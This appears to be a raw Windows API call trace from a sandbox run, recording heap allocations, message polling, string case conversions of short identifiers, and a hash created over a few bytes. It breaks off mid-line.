PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.710] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.710] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.710] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0258.710] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.711] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0258.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.712] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.712] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.712] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.712] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.712] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.713] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.713] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.713] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.713] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.713] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0258.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.714] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.714] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.714] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.714] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.714] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.714] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.714] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.714] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.715] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.715] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.715] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0258.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.715] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.716] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.716] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.716] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.716] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.716] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.716] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.716] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.717] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.719] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.719] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.720] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.720] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.720] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.721] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.721] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.721] CryptHashData (hHash=0xaa5820, pbData=0x24b1868, dwDataLen=0x3, dwFlags=0x1) returned 1 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) 